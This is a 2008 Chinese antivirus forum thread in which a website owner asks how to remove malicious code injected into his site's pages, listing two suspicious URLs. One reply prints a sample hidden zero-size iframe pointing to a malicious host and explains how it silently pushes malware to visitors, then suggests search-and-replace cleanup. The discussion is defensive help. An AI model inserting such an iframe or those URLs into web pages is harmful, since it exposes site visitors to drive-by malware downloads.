瑞星卡卡安全论坛技术交流区反病毒/反流氓软件论坛 十分可疑:http://xxx.hao1680.com/wm/jh.htm

1   1  /  1  页   跳转

十分可疑:http://xxx.hao1680.com/wm/jh.htm

十分可疑:http://xxx.hao1680.com/wm/jh.htm

我的服务器是WIN2003,更新过系统文件,安装过360安全卫士防火墙、瑞星杀毒2008正版软件(每晚0:00凌晨自动升级),现我的网站被挂马,查不出所以然来。
http://xxx.hao1680.com/wm/jh.htm
http://unstat.baiduuo.cn/mm.htm
只想清除这些可恶的木马,所有木马查杀软件都用了,一点儿不奏效。

帮帮忙啊,谢谢了。

[用户系统信息]Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; MAXTHON 2.0)
最后编辑2008-01-27 20:57:33
分享到:
gototop
 

查一下网页源码
gototop
 

那要怎么查?除iframe、script之外还搜索哪些关键字?ASP代码关键字又是什么?
gototop
 

网页挂马的方法比较多,好像还有个body什么,具体的更多方法建议你参考相关资料
gototop
 

挂马会在所有页面末尾加入类似以下的代码行
<iframe src=http://xxx.hao1680.com/xx.htm?id=011 width=0 height=0></iframe>
有的网页有时会被挂上十几行这样的代码,代码行iframe  /iframe定义的是一个页面调用,width和height定义页面的大小,代码内都是0,所以访问者看不到页面,但该页面已经被调用,并执行页面中的代码,比如将恶意软件或病毒文件下载到客户端,并在后台安装,到达某些盗号程序的扩散.任何杀毒软件和恶意软件清除工具均不会认为这些代码有问题.
解决方法,检查网页代码末行是否有类似这样结构的代码行,多检查几个网页即可确认那些代码行是木马代码,使用查找替换工具,对整个网站的页面进行搜索替换,对本地的机器也要做相同的处理.
gototop
 

如果木马是加密的或是隐藏了,该怎么办?
gototop
 
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT